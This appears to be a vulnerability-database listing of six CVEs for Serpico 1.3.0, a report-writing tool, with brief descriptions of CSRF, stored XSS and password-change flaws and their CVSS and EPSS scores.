Serpico@1.3.0 Security Vulnerabilities and Issues — Serpico@1.3.0 CVE List

Lucene search

Serpico ProjectSerpico1.3.0

6 matches found

CVE•added 2020/01/15 11:15 p.m.•69 views

CVE-2019-19854

An issue was discovered in Serpico (aka SimplE RePort wrIting and CollaboratiOn tool) 1.3.0. It does not use CSRF Tokens to mitigate against CSRF; it uses the Origin header (which must match the request origin). This is problematic in conjunction with XSS: one can escalate privileges from User leve...

8.8CVSS8.8AI score0.00141EPSS

CVE•added 2020/01/15 11:15 p.m.•69 views

CVE-2019-19858

An issue was discovered in Serpico (aka SimplE RePort wrIting and CollaboratiOn tool) 1.3.0. admin/add_user/UID allows stored XSS via the author parameter.

4.8CVSS4.8AI score0.00321EPSS

CVE•added 2020/01/15 11:15 p.m.•65 views

CVE-2019-19857

An issue was discovered in Serpico (aka SimplE RePort wrIting and CollaboratiOn tool) 1.3.0. An admin can change their password without providing the current password, by using interfaces outside the Change Password screen. Thus, requiring the admin to enter an Old Password value on the Change Pass...

6.5CVSS6.5AI score0.00209EPSS

CVE•added 2020/01/15 11:15 p.m.•62 views

CVE-2019-19856

An issue was discovered in Serpico (aka SimplE RePort wrIting and CollaboratiOn tool) 1.3.0. The User Type on the admin/list_user page allows stored XSS via the type parameter.

4.8CVSS4.8AI score0.00235EPSS

CVE•added 2020/01/15 11:15 p.m.•60 views

CVE-2019-19855

An issue was discovered in Serpico (aka SimplE RePort wrIting and CollaboratiOn tool) 1.3.0. admin/list_user allows stored XSS via the auth_type parameter.

4.8CVSS4.8AI score0.00235EPSS

CVE•added 2020/01/15 11:15 p.m.•59 views

CVE-2019-19859

An issue was discovered in Serpico (aka SimplE RePort wrIting and CollaboratiOn tool) 1.3.0. The Add Collaborator allows unlimited data via the author parameter, even if the data does not match anything in the database.

5.3CVSS5.2AI score0.00237EPSS